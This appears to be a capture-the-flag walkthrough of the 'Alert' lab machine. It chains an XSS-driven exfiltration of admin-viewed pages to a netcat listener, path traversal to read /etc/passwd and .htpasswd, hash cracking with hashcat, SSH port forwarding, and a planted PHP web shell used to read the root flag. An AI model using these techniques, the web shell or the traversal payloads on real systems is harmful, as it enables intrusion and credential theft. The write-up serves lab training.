‼️Alert

Nmap scan

image.png

The addressing seems to be in the form of http://alert.htb/inmdex.php?page=<page>

path traversal from there is not working, so let's recon a bit more

Filter out response with the size of 690 so we could see which are actually used

“messages” seems interesting, enum subdomains

have a look

mmmh better leave statistics there for now. In the "About" section we see some useful info

Let's get back to the markdown visualizer and check if there are some vulnerabilities that we can exploit.

Since it let's you visualize the markdown, we could try to inject some javascript (XSS)

And indeed it works...

So the idea now is to let the admin read the messages pages and send it to us. How? Previously we saw the "About" page where it states that the admins are quite fast to read the messages we sent them, so we use the share mechanism of the markdown viewer to create a shared link of a vulnerable markdown, sent it to the administrators and wait for the response.

Here we are basically creating a markdown with an embedded js script that set the page we want to see, set up our ip with a listener port, and used the fetch method to open the target page and send the page content to us, so we need to setup a netcat listener (nc -nvlp 4444) with the open port we configured.

Once we visualized the markdown and click the 'share' button, copy the link and send it to the admins

After a couple of seconds, our listener gets the page content

It seems that the page the admin sees, points directly to a message

messages.php?file=2024-03-10_15-48-34.txt

smells like a directory traversal, let's try to get /etc/passwd using the same technique.

we set the target uri to: messages.php?file=../../../../../../etc/passwd

It worked!

We now know that albert and david are the only two usable users other than root (they are the only ones that have an actual shell to login)

we tried /etc/shadow not opened, so we must be non-root user

let's try /etc/hosts ...nothing more that what we've already found

We tried to fuzz more the statistics page we left behind, but everything responded with 401, so filtering that out

That's good, .htpasswd if accessible could leak some passwords...let's use the same technique to exfiltrate/var/www/<site>/.htpasswd

Let's go! It's an apache hash so save it and crack it with hashcat -a3 -m 1600 ./shadow.txt /usr/share/wordlists/rockyou.txt

Ssh into the machine, get the flag and look around for privesc

no sudo -l, no cronjobs, but some open sockets...

Let's make this port reachable for us and connect to it

ssh -L 8080:127.0.0.1:8080 albert@10.10.11.44

nothing interesting, let's check some more information about this process

The process is ran by root, so this must be the way...

we can change things inside the config folder, so we can create a web shell in php:

<?php system($_GET[cmd]) ?>

And reach it through the link: http://127.0.0.1:8080/config/shell.php

Let's test it with a whoami command

Let's get our flag.

http://127.0.0.1:8080/config/shell.php?cmd=cat%20/root/root.txt

And we're done.